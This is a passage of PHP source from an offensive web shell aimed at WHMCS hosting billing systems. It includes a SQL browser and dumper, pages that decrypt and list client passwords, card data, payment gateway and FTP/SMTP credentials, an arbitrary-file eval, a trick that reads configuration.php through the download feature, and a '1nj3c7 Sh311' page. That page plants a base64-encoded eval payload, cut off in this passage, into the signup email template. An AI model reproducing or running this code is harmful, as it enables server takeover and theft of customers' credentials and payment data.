  597.     ,(".implode(", ",$item).")";
  598. if($fp)fwrite($fp,$sql);
  599. else echo($sql);
  600. }if(!$head)if($fp)fwrite($fp,";
  601.  
  602.  
  603. ");
  604. else echo(";
  605.  
  606.  
  607. ");
  608. break;
  609. case"pgsql":$this->query("SELECT * FROM ".$table);
  610. while($item=$this->fetch()){$columns=array();
  611. foreach($item as$k=>$v){$item[$k]="'".addslashes($v)."'";
  612. $columns[]=$k;
  613. }$sql="INSERT INTO ".$table." (".implode(", ",$columns).") VALUES (".implode(", ",$item).");
  614. "."
  615. ";
  616. if($fp)fwrite($fp,$sql);
  617. else echo($sql);
  618. }break;
  619. }return false;
  620. }}$db=new DbClass($_POST["type"]);
  621. if(@$_POST["p2"]=="download"){$db->connect($_POST["sql_host"],$_POST["sql_login"],$_POST["sql_pass"],$_POST["sql_base"]);
  622. $db->selectdb($_POST["sql_base"]);
  623. switch($_POST["charset"]){case"Windows-1251":$db->setCharset("cp1251");
  624. break;
  625. case"UTF-8":$db->setCharset("utf8");
  626. break;
  627. case"KOI8-R":$db->setCharset("koi8r");
  628. break;
  629. case"KOI8-U":$db->setCharset("koi8u");
  630. break;
  631. case"cp866":$db->setCharset("cp866");
  632. break;
  633. }if(empty($_POST["file"])){ob_start("ob_gzhandler",4096);
  634. header("Content-Disposition: attachment;
  635.  filename=dump.sql");
  636. header("Content-Type: text/plain");
  637. foreach($_POST["tbl"]as$v)$db->dump($v);
  638. exit;
  639. }elseif($fp=@fopen($_POST["file"],"w")){foreach($_POST["tbl"]as$v)$db->dump($v,$fp);
  640. fclose($fp);
  641. unset($_POST["p2"]);
  642. }else die("<script>alert(\"Error! Can't open file\");
  643. window.history.back(-1)</script>");
  644. }echo"
  645. <center><h1>Sql browser</h1></center><div class=content>
  646. <form name='sf' method='post' onsubmit='fs(this);
  647. '><table cellpadding='2' cellspacing='0'><tr valign='top'>
  648. <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr valign='top'>
  649. <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='".htmlspecialchars($GLOBALS["cwd"])."'><input type=hidden name=charset value='".(isset($_POST["charset"])?$_POST["charset"]:"")."'>
  650. <td><select name='type'><option value='mysql' ";
  651. if(@$_POST["type"]=="mysql")echo"selected";
  652. echo">MySql</option><option value='pgsql' ";
  653. if(@$_POST["type"]=="pgsql")echo"selected";
  654. echo">PostgreSql</option></select></td>
  655. <td><input type=text name=sql_host value='".(empty($_POST["sql_host"])?$_COOKIE["db_host"]:htmlspecialchars($_POST["sql_host"]))."'></td>
  656. <td><input type=text name=sql_login value='".(empty($_POST["sql_login"])?$_COOKIE["db_username"]:htmlspecialchars($_POST["sql_login"]))."'></td>
  657. <td><input type=text name=sql_pass value='".(empty($_POST["sql_pass"])?$_COOKIE["db_password"]:htmlspecialchars($_POST["sql_pass"]))."'></td><td>";
  658. $tmp="<input type=text name=sql_base value='".$_COOKIE["db_name"]."'>";
  659. if(isset($_POST["sql_host"])){if($db->connect($_POST["sql_host"],$_POST["sql_login"],$_POST["sql_pass"],$_POST["sql_base"])){switch($_POST["charset"]){case"Windows-1251":$db->setCharset("cp1251");
  660. break;
  661. case"UTF-8":$db->setCharset("utf8");
  662. break;
  663. case"KOI8-R":$db->setCharset("koi8r");
  664. break;
  665. case"KOI8-U":$db->setCharset("koi8u");
  666. break;
  667. case"cp866":$db->setCharset("cp866");
  668. break;
  669. }$db->listDbs();
  670. echo"<select name=sql_base><option value=''></option>";
  671. while($item=$db->fetch()){list($key,$value)=each($item);
  672. echo"<option value=\"".$value."\" ".($value==$_POST["sql_base"]?"selected":"").">".$value."</option>";
  673. }echo"</select>";
  674. }else echo$tmp;
  675. }else echo$tmp;
  676. echo"</td>
  677.                 <td><input type=submit value='>>' onclick='fs(d.sf);
  678. '></td>
  679.                 <td><input type=checkbox name=sql_count value='on'".(empty($_POST["sql_count"])?"":" checked")."> count the number of rows</td>
  680.             </tr>
  681.         </table>
  682.         <script>
  683.             s_db='".@addslashes($_POST["sql_base"])."';
  684.  
  685.             function fs(f) {
  686.                 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
  687.  
  688.                     if(f.p1) f.p1.value='';
  689.  
  690.                     if(f.p2) f.p2.value='';
  691.  
  692.                     if(f.p3) f.p3.value='';
  693.  
  694.                 }
  695.             }
  696.             function st(t,l) {
  697.                 d.sf.p1.value = 'select';
  698.  
  699.                 d.sf.p2.value = t;
  700.  
  701.                 if(l && d.sf.p3) d.sf.p3.value = l;
  702.  
  703.                 d.sf.submit();
  704.  
  705.             }
  706.             function is() {
  707.                 for(i=0;
  708. i<d.sf.elements['tbl[]'].length;
  709. ++i)
  710.                     d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
  711.  
  712.             }
  713.         </script>";
  714. if(isset($db)&&$db->link){echo"<br/><table width=100% cellpadding=2 cellspacing=0>";
  715. if(!empty($_POST["sql_base"])){$db->selectdb($_POST["sql_base"]);
  716. echo"<tr valign='top'><td width=1 style='border-top:2px solid #666;
  717. '><span>Tables:</span><br><br>";
  718. $tbls_res=$db->listTables();
  719. while($item=$db->fetch($tbls_res)){list($key,$value)=each($item);
  720. if(!empty($_POST["sql_count"]))$n=$db->fetch($db->query("SELECT COUNT(*) as n FROM ".$value.""));
  721. $value=htmlspecialchars($value);
  722. echo"<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;
  723. <a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST["sql_count"])?"&nbsp;
  724. ":" <small>({$n['n']})</small>")."</nobr><br>";
  725. }echo"<input type='checkbox' onclick='is();
  726. '> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";
  727. document.sf.submit();
  728. '><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;
  729. '>";
  730. if(@$_POST["p1"]=="select"){$_POST["p1"]="query";
  731. $_POST["p3"]=$_POST["p3"]?$_POST["p3"]:1;
  732. $db->query("SELECT COUNT(*) as n FROM ".$_POST["p2"]);
  733. $num=$db->fetch();
  734. $pages=ceil($num["n"]/30);
  735. echo"<script>d.sf.onsubmit=function(){st(\"".$_POST["p2"]."\", d.sf.p3.value)}</script><span>".$_POST["p2"]."</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int)$_POST["p3"]).">";
  736. echo" of $pages";
  737. if($_POST["p3"]>1)echo" <a href=# onclick='st(\"".$_POST["p2"]."\", ".($_POST["p3"]-1).")'>&lt;
  738.  Prev</a>";
  739. if($_POST["p3"]<$pages)echo" <a href=# onclick='st(\"".$_POST["p2"]."\", ".($_POST["p3"]+1).")'>Next &gt;
  740. </a>";
  741. $_POST["p3"]--;
  742. if($_POST["type"]=="pgsql")$_POST["p2"]="SELECT * FROM ".$_POST["p2"]." LIMIT 30 OFFSET ".($_POST["p3"]*30);
  743. else$_POST["p2"]="SELECT * FROM `".$_POST["p2"]."` LIMIT ".($_POST["p3"]*30).",30";
  744. echo"<br><br>";
  745. }if((@$_POST["p1"]=="query")&&!empty($_POST["p2"])){$db->query(@$_POST["p2"]);
  746. if($db->res!==false){$title=false;
  747. echo"<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">";
  748. $line=1;
  749. while($item=$db->fetch()){if(!$title){echo"<tr valign=\"top\">";
  750. foreach($item as$key=>$value)echo"<td>".$key."</td>";
  751. reset($item);
  752. $title=true;
  753. echo"</tr><tr valign=\"top\">";
  754. $line=2;
  755. }echo"<tr valign=\"top\"class=\"l".$line."\">";
  756. $line=$line==1?2:1;
  757. foreach($item as$key=>$value){if($value==null)echo"<td><i>null</i></td>";
  758. else echo"<td>".nl2br(htmlspecialchars($value))."</td>";
  759. }echo"</tr>";
  760. }echo"</table>";
  761. }else{echo"<div><b>Error:</b> ".htmlspecialchars($db->error())."</div>";
  762. }}echo"<br></form><form onsubmit='d.sf.p1.value=\"query\";
  763. d.sf.p2.value=this.query.value;
  764. document.sf.submit();
  765. return false;
  766. '><textarea name='query' style='width:100%;
  767. height:100px'>";
  768. if(!empty($_POST["p2"])&&($_POST["p1"]!="loadfile"))echo htmlspecialchars($_POST["p2"]);
  769. echo"</textarea><br/><input type=submit value='Execute'>";
  770. echo"</td></tr>";
  771. }echo"</table></form><br/>";
  772. if($_POST["type"]=="mysql"){$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
  773. if($db->fetch())echo"<form onsubmit='d.sf.p1.value=\"loadfile\";
  774. document.sf.p2.value=this.f.value;
  775. document.sf.submit();
  776. return false;
  777. '><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  778. }if(@$_POST["p1"]=="loadfile"){$file=$db->loadFile($_POST["p2"]);
  779. echo"<pre class=ml1>".htmlspecialchars($file["file"])."</pre>";
  780. }}else{echo htmlspecialchars($db->error());
  781. }echo"</div>";
  782. }function multiview($p,$table,$name,$order,$where,$col,$sql,$export=0,$if=""){global$cc_encryption_hash;
  783. $qq=$_GET["qq"];
  784. $q=str_replace(" ","%",$_POST["q"]);
  785. if($qq<>"")$q=$qq;
  786. if($q=="")$q="%";
  787. if($qq=="")$qq=$q;
  788. $query=mysql_query("SELECT * FROM $table  LIMIT  0,5");
  789. if(!is_array(mysql_fetch_array($query))){echo"<p class=\"msg error\">Nothing Found !</p>";
  790. }else{echo"<center><h1>$name</h1> <br>";
  791. if($export==1){echo"<form action=\"?p=$p\" name=\"formw\" method=\"post\">
  792.  
  793. <input name=\"export\" type=\"hidden\" value=\"1\">
  794. <center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[Save to TXT file ]\" /></form></center><br>";
  795. }echo("<center><h3  class=\"tit\">Search</h3><FORM action=\"?p=$p\"  method=\"post\">
  796.  
  797. <input type=\"text\" name=\"q\" value=\"$q\">
  798. <br>
  799. <INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\">
  800. </form>");
  801. if(isset($_GET["page"])){$page=intval($_GET["page"]);
  802. }else{$page=1;
  803. }if(is_array($where)){$where2="'0";
  804. foreach($where as$w){$where2.="' or $w LIKE '%$q%";
  805. }$where2.="'";
  806. }else{$where2=$where;
  807. }$start_from=($page-1)*100;
  808. $query=mysql_query("SELECT * FROM $table where $if ($where2) order by $order LIMIT $start_from , 100 ");
  809. $total_records=mysql_num_rows(mysql_query("SELECT * FROM $table where $if ($where2) order by $order"));
  810. echo("<h3  class=\"tit\">Total Records ".$total_records."</h3><br>");
  811. $total_pages=ceil($total_records/100);
  812. echo("<br><table border='0'><tr>");
  813. echo("<th>Page ".$page." Of ".$total_pages."</th>");
  814. if($page>1)echo"<td><a href='?p=$p&qq=".$qq."&page=".($page-1)."'>Back</a>&nbsp</td>";
  815. echo"<td><a href='?p=$p&qq=".$qq."&page=".$total_pages."'>Latest</a></td>";
  816. if($page<$total_pages)echo"<td>&nbsp<a href='?p=$p&qq=".$qq."&page=".($page+1)."'>Next</a>&nbsp</td>";
  817. for($i=0;
  818. $i<=$total_pages;
  819. $i++){if($i%2==0){$bg2="class=\"bg2\"";
  820. }else{$bg2="";
  821. }if($i%20==0)echo"</tr><tr >";
  822. if($i==0){echo"<td>&nbsp&nbsp</td>";
  823. }else{if($i==$page){echo"<td $bg2>&nbsp<a href='?p=$p&qq=".$qq."&page=".$i."'>(".$i.")</a>&nbsp</td>";
  824. }else{echo"<td $bg2>&nbsp<a href='?p=$p&qq=".$qq."&page=".$i."'>".$i."</a>&nbsp</td>";
  825. }}}echo("</tr></table>");
  826. if(!is_array(mysql_fetch_array($query))){echo"<p class=\"msg error\">Nothing Found !</p>";
  827. exit;
  828. }echo"<br><table ><tr>";
  829. foreach($col as$col1){echo"<th>$col1</th>";
  830. }echo" </tr>";
  831. $query=mysql_query("SELECT * FROM $table where $if ($where2) order by $order LIMIT $start_from , 100 ");
  832. $ii=0;
  833. while($v=mysql_fetch_array($query)){if($ii%2==0){$bg="class=\"bg\"";
  834. }else{$bg="";
  835. }echo"<tr $bg >";
  836. foreach($sql as$sql1){if($sql1=="password"){echo"<td>".decrypt($v["password"],$cc_encryption_hash)."</td>";
  837. }elseif(($sql1=="userid")or(($table="tblclients")and($sql1=="id"))){echo"<td> <a href='?p=12&id=".$v[$sql1]."'>".$v[$sql1]."</a></td>";
  838. }else{echo"<td>".$v[$sql1]."</td>";
  839. }}echo"</tr>";
  840. $ii++;
  841. }echo"</table>";
  842. }}function table($sql,$col){global$cc_encryption_hash;
  843. $q=mysql_query($sql);
  844. if(!is_array(@mysql_fetch_array($q))){echo"<p class=\"msg error\">Nothing Found !</p>";
  845. return;
  846. }$q=mysql_query($sql);
  847. echo("<br><table border='0'>");
  848. echo"<tr>";
  849. foreach($col as$sql1){echo"<th>".ucfirst($sql1)."</th>";
  850. }echo"</tr>";
  851. $ii=0;
  852. while($v=mysql_fetch_array($q)){if($ii%2==0){$bg="class=\"bg\"";
  853. }else{$bg="";
  854. }echo"<tr $bg >";
  855. foreach($col as$sql1){if($sql1=="password"){echo"<td>".decrypt($v["password"],$cc_encryption_hash)."</td>";
  856. }elseif(($sql1=="userid")or(($table="tblclients")and($sql1=="id"))){echo"<td> <a href='?p=12&id=".$v[$sql1]."'>".$v[$sql1]."</a></td>";
  857. }else{echo"<td>".$v[$sql1]."</td>";
  858. }}echo"</tr>";
  859. $ii++;
  860. }echo"</table><br>";
  861. }@set_time_limit(0);
  862. ob_start();
  863. if($auth==1){if(!isset($_SERVER["PHP_AUTH_USER"])||md5($_SERVER["PHP_AUTH_USER"])!==$user||md5($_SERVER["PHP_AUTH_PW"])!==$pass){header("WWW-Authenticate: Basic realm='Powered By RAB3OUN'");
  864. header("HTTP/1.0 401 Unauthorized");
  865. exit("Go To Hell");
  866. }}$p=$_GET["p"];
  867. if($_POST["form_action"]==1){setcookie("db_host",$_POST["db_host"]);
  868. setcookie("db_username",$_POST["db_username"]);
  869. setcookie("db_password",$_POST["db_password"]);
  870. setcookie("db_name",$_POST["db_name"]);
  871. setcookie("login","1");
  872. setcookie("cc_encryption_hash",$_POST["cc_encryption_hash"]);
  873. $c=@mysql_connect($_POST["db_host"],$_POST["db_username"],$_POST["db_password"]);
  874. $c2=@mysql_select_db($_POST["db_name"],$c);
  875. if($c and$c2){echo"<center><p class=\"msg done\">Done : Connection Successfully      </p></center>";
  876. echo("<meta http-equiv='refresh' content='1;
  877. URL=?p=102' />");
  878. }else{echo"<p class=\"msg error\">Database error</p>";
  879. }}if($_POST["form_action"]==2){$file=($_POST["file"]);
  880. $text=file_get_contents($file);
  881. $text=str_replace("<?php","",$text);
  882. $text=str_replace("<?","",$text);
  883. $text=str_replace("?>","",$text);
  884. eval($text);
  885. setcookie("db_host",$db_host);
  886. setcookie("db_username",$db_username);
  887. setcookie("db_password",$db_password);
  888. setcookie("db_name",$db_name);
  889. setcookie("login","1");
  890. setcookie("cc_encryption_hash",$cc_encryption_hash);
  891. $c=@mysql_connect($db_host,$db_username,$db_password);
  892. $c2=mysql_select_db($db_name,$c);
  893. if($c and$c2){echo"<center><p class=\"msg done\">Done : Connection Successfully      </p></center>";
  894. echo("<meta http-equiv='refresh' content='1;
  895. URL=?p=102' />");
  896. }else{echo"<p class=\"msg error\">Database error</p>";
  897. }}if($_POST["form_action"]==3){$key=($_POST["key"]);
  898. $key=explode("-",$key);
  899. $v=explode("|",base64_decode($key[1]));
  900. setcookie("db_host",base64_decode($v[0]));
  901. setcookie("db_username",base64_decode($v[1]));
  902. setcookie("db_password",base64_decode($v[2]));
  903. setcookie("db_name",base64_decode($v[3]));
  904. setcookie("login","1");
  905. setcookie("cc_encryption_hash",base64_decode($v[4]));
  906. $c=@mysql_connect(base64_decode($v[0]),base64_decode($v[1]),base64_decode($v[2]));
  907. $c2=@mysql_select_db(base64_decode($v[3]),$c);
  908. if($c and$c2){echo"<center><p class=\"msg done\">Done : Connection Successfully      </p></center>";
  909. echo("<meta http-equiv='refresh' content='1;
  910. URL=?p=102' />");
  911. }else{echo"<p class=\"msg error\">Database error</p>";
  912. }echo("<meta http-equiv='refresh' content='1;
  913. URL=?p=102' />");
  914. }if($_COOKIE["login"]=="1"){$db_host=($_COOKIE["db_host"]);
  915. $db_username=($_COOKIE["db_username"]);
  916. $db_password=($_COOKIE["db_password"]);
  917. $db_name=($_COOKIE["db_name"]);
  918. $cc_encryption_hash=($_COOKIE["cc_encryption_hash"]);
  919. $link=@mysql_connect($db_host,$db_username,$db_password);
  920. mysql_select_db($db_name,$link);
  921. }if($p and($_COOKIE["login"]<>"1")){header2();
  922. login();
  923. exit;
  924. }if(($_COOKIE["login"]<>"1")){header2();
  925. login();
  926. exit;
  927. }$db_host=($_COOKIE["db_host"]);
  928. $db_username=($_COOKIE["db_username"]);
  929. $db_password=($_COOKIE["db_password"]);
  930. $db_name=($_COOKIE["db_name"]);
  931. $cc_encryption_hash=($_COOKIE["cc_encryption_hash"]);
  932. $link=@mysql_connect($db_host,$db_username,$db_password);
  933. mysql_select_db($db_name,$link);
  934. if(!$link){echo("<h1>Database error</h1>");
  935. header1();
  936. login();
  937. exit;
  938. }if($p)header1();
  939. echo"<a style=\"display:scroll;
  940. position:fixed;
  941. bottom:5px;
  942. right:5px;
  943. \" href=\"#\" title=\"Back to Top\"><img src=\"?img=1\" /></a> ";
  944. switch($p){case"m":echo("<table><tr><td><a href=\"?p=h\" target=\"frame1\"> Home</a></td></tr><tr><td>
  945. <a href=\"?p=102\" target=\"frame1\"> Info</a></td></tr><tr><td>
  946. <a href=\"?p=1\" target=\"frame1\"> H0st r00ts</a></td></tr><tr><td>
  947. <a href=\"?p=2\" target=\"frame1\"> Domains Resellers</a></td></tr><tr><td>
  948. <a href=\"?p=3\" target=\"frame1\"> Clients r00ts</a></td></tr><tr><td>
  949. <a href=\"?p=4\" target=\"frame1\"> Clients Hosting Accounts</a></td></tr><tr><td>
  950. <a href=\"?p=5\" target=\"frame1\"> Clients CC</a></td></tr><tr><td>
  951. <a href=\"?p=63\" target=\"frame1\"> Clients Tickets </a></td></tr><tr><td>
  952. <a href=\"?p=7\" target=\"frame1\"> FTP and SMTP password</a></td></tr><tr><td>
  953.  
  954. <a href=\"?p=8\" target=\"frame1\"> Tools</a>
  955. </td></tr><tr><td>
  956. <a href=\"?p=99\" target=\"frame1\"> SQL</a></td></tr><tr><td>
  957. <a href=\"?p=100\" target=\"frame1\"> Clients list </a></td></tr><tr><td>
  958. <a href=\"?p=105\" target=\"frame1\">Clients Password</a></td></tr><tr><td>
  959. <a href=\"?p=11\" target=\"frame1\">BackUp</a></td></tr><tr><td>
  960. <a href=\"?p=101\" target=\"frame1\">Eval PHP</a></td></tr><tr><td>
  961. <a href=\"?p=106\" target=\"frame1\"> DailyEmailBackup</a></td></tr><tr><td><a href=\"?p=107\" target=\"frame1\"> Index</a></td></tr><tr><td><a href=\"?p=108\" target=\"frame1\"> 1nj3c7 Sh311</a></td></tr><tr><td><a href=\"?p=109\" target=\"frame1\"> Payment Gateways</a></td></tr><tr><td><a href=\"?p=111\" target=\"frame1\"> Addon Modules</a></td></tr><tr><td><a href=\"?p=110\" target=\"frame1\"> Load File</a></td></tr><tr><td><a href=\"?p=112\" target=\"frame1\"> Custom Fields</a></td></tr><tr><td>
  962. <a href=\"?p=9\" target=\"_parent\"> Logout</a></td></tr></table>");
  963. break;
  964. case"h":login();
  965. exit;
  966. break;
  967. case 110:$r=randomt();
  968. $query0=mysql_query("SELECT value FROM tblconfiguration where setting='SystemURL'");
  969. $v0=mysql_fetch_array($query0);
  970. $SystemURL=$v0["value"];
  971. echo"<table><form method=\"POST\" action=\"?p=110\" >
  972. <tr><td>Website Url</td><td>
  973. <input type=\"text\" size=60 name=\"url\" value=\"".$SystemURL."\"></td></tr>
  974. <tr><td>File</td><td><input type=\"text\" size=60 name=\"file\" value=\"../configuration.php\"></td></tr>
  975. </table>
  976. <input type=\"Submit\" name=\"Submit\" value=\"Submit\">
  977. <input type=\"hidden\" name=\"action\" value=\"1\"></form>";
  978. if($_POST["action"]=="1"){$result=mysql_query("INSERT INTO `tbldownloadcats` (`id`, `parentid`, `name`, `description`, `hidden`) VALUES
  979. ('', 0, '$r', '', '');
  980. ")or die("Erreur SQL !<br>".mysql_error());
  981. $id=mysql_insert_id();
  982. $result=mysql_query("INSERT INTO `tbldownloads` (`id`, `category`, `type`, `title`, `description`, `downloads`, `location`, `clientsonly`,  `productdownload`) VALUES
  983. ('', '$id', 'zip', '$r', '$r', 0, '".$_POST["file"]."', '', '');
  984. ")or die("Erreur SQL !<br>".mysql_error());
  985. $id=mysql_insert_id();
  986. $ch=curl_init();
  987. curl_setopt($ch,CURLOPT_URL,$_POST["url"]."/dl.php?type=d&id=$id");
  988. curl_setopt($ch,CURLOPT_HEADER,0);
  989. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  990. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1;
  991.  WOW64;
  992.  rv:12.0) Gecko/20100101 Firefox/12.0 ");
  993. $result=curl_exec($ch);
  994. echo"<xmp>$result</xmp>";
  995. $result=mysql_query("delete from  `tbldownloadcats`  where `name`='$r'");
  996. $result=mysql_query("delete from  `tbldownloads`  where `title`='$r'");
  997. }break;
  998. case 112:if(($_POST["action"]=="1")and is_array($_POST["id"])){echo("<center><h1>Custom Fields Values</h1><br><table border'1'>");
  999. $x=implode(",",$_POST["id"]);
  1000. $result=mysql_query("SELECT * FROM `tblcustomfieldsvalues` where fieldid in ($x)  order by relid");
  1001. $fieldnum=@mysql_num_fields($result);
  1002. echo("<tr>");
  1003. for($i=0;
  1004. $i<$fieldnum;
  1005. $i++){$name=@mysql_field_name($result,$i);
  1006. echo("<th>$name</th>");
  1007. }echo("</tr>");
  1008. $last="";
  1009. $k=0;
  1010. while($v=@mysql_fetch_array($result,1)){if($k%2==0){$bg="class=\"bg\"";
  1011. }else{$bg="";
  1012. }if($v["relid"]<>$last)echo"<TR><TD COLSPAN=14>&nbsp;
  1013. </td></TR>";
  1014. $last=$v["relid"];
  1015. $td="<tr $bg><td>";
  1016. $td=$td.implode("</td><td>",$v);
  1017. $td=$td."</tr>
  1018. ";
  1019. echo($td);
  1020. $k++;
  1021. }echo("</table></center>");
  1022. exit;
  1023. }echo("<center><h1>Custom Fields</h1><br></center><form action=\"?p=112\" name=\"formw\" method=\"post\"><table width='75%'  border='1'>");
  1024. $result=mysql_query("SELECT * FROM `tblcustomfields` order by relid ");
  1025. $fieldnum=@mysql_num_fields($result);
  1026. echo("
  1027. <tr><th></th>");
  1028. for($i=0;
  1029. $i<$fieldnum;
  1030. $i++){$name=@mysql_field_name($result,$i);
  1031. echo("<th>$name</th>");
  1032. }echo("</tr>");
  1033. $last="";
  1034. $k=1;
  1035. while($v=@mysql_fetch_array($result,1)){if($v["relid"]<>$last){echo"<TR><TD COLSPAN=14>&nbsp;
  1036. </td></TR>";
  1037. $k++;
  1038. }if($k%2==0){$bg="class=\"bg\"";
  1039. }else{$bg="";
  1040. }$last=$v["relid"];
  1041. $id=$v["id"];
  1042. $td="
  1043. <tr $bg><td>
  1044. <input type=\"checkbox\" name=\"id[]\" value=\"$id\"  />
  1045. </td><td>";
  1046. $td=$td.implode("</td><td >",$v);
  1047. $td=$td."</td></tr>
  1048. ";
  1049. echo($td);
  1050. }echo("</table><br><input type='hidden' name='action' value='1'/><input type='submit'/></form>");
  1051. break;
  1052. case 111:echo("<center><h1>Addon Modules</h1>");
  1053. table("SELECT * FROM `tbladdonmodules` order by module",array("module","setting","value"));
  1054. echo("</center>");
  1055. break;
  1056. case 109:echo("<center><h1>Payment Gateways</h1><br>");
  1057. table("SELECT * FROM `tblpaymentgateways`",array("gateway","setting","value","order"));
  1058. echo("</center>");
  1059. break;
  1060. case 105:echo"<center><h1>Clients Password</h1>";
  1061. $query0=mysql_query("SELECT * FROM tblemailtemplates where name='Client Signup Email' or name='Password Reset Confirmation'");
  1062. while($v0=mysql_fetch_array($query0)){$t=$v0["subject"];
  1063. $t=trim(str_replace("{\$company_name}","",$t));
  1064. $c=$v0["message"];
  1065. $c=explode("
  1066. ",$c);
  1067. $r="";
  1068. for($i=0;
  1069. $i<count($c);
  1070. $i++){if(strpos($c[$i],"{\$client_password}")>0){$r.=$c[$i];
  1071. }elseif(strpos($c[$i],"{\$client_email}")>0){$r.=$c[$i];
  1072. }}$r=preg_quote($r);
  1073. $r=str_replace("\{\\\$client_email\\}","(.*)",$r);
  1074. $r=str_replace("\{\\\$client_password\\}","(.*)",$r);
  1075. $r=str_replace("\{\\$whmcs_link\}","(.*)",$r);
  1076. $r=str_replace("\{\\\$signature\}","(.*)",$r);
  1077. $r=str_replace("\{\\\$client_name\}","(.*)",$r);
  1078. $r=str_replace("
  1079. ","",$r);
  1080. $r=str_replace("
  1081. ","",$r);
  1082. $query=mysql_query("SELECT message,userid FROM tblemails where subject like '%".$t."%'");
  1083. while($v=mysql_fetch_array($query)){$mail=$v["message"];
  1084. $mail=str_replace("
  1085. ","",$mail);
  1086. $mail=str_replace("
  1087. ","",$mail);
  1088. $reg="|(.*)$r(.*)|isU";
  1089. $a=array();
  1090. preg_match_all($reg,($mail),$a);
  1091. for($i=1;
  1092. $i<count($a);
  1093. $i++){if(eregi("^[_\.0-9a-z-]+@([0-9a-z-]+\.)+[a-z]{2,10}\$",$a[$i][0])){$list[$v["userid"]]["mail"][]=$a[$i][0];
  1094. $list[$v["userid"]]["pass"][]=$a[$i+1][0];
  1095. }}}}echo("<h3  class=\"tit\">Total Records ".(count($list)-1)."</h3>");
  1096. echo"<table border='1'>";
  1097. foreach($list as$x=>$y){echo"<tr><td><a href='?p=12&id=$x'>$x</a></td><td>".implode("<br>",$y["mail"])."</td><td>".implode("<br>",$y["pass"])."</td></tr>";
  1098. }echo"</table>";
  1099. break;
  1100. case 108:echo"<center><h1>1nj3c7 Sh311</h1>";
  1101. if($_POST["action"]=="1"){$tryChaning=mysql_query("Update tblemailtemplates set message='".mysql_real_escape_string(stripslashes($_POST["c"]))."' where name='Client Signup Email'")or die("Erreur SQL !<br>".mysql_error());
  1102. if($tryChaning){echo"<p class=\"msg done\">Updated successfully </p>";
  1103. }else{echo("<h3  class=\"tit\"><br>Error</h3>");
  1104. }}$query0=mysql_query("SELECT message from  tblemailtemplates where name='Client Signup Email'");
  1105. $v0=mysql_fetch_array($query0);
  1106. echo"<br><form method=\"POST\" action=\"?p=108\" ><textarea name=\"c\" cols='50' rows='10' >".$v0["message"]."</textarea><br><br><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"action\" value=\"1\"></form>";
  1107. echo"</center><p class='msg warning'>Add one of this code<u> in the end of code</u> And register you will get your file</p><br><center>";
  1108. echo"<fieldset><legend>rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1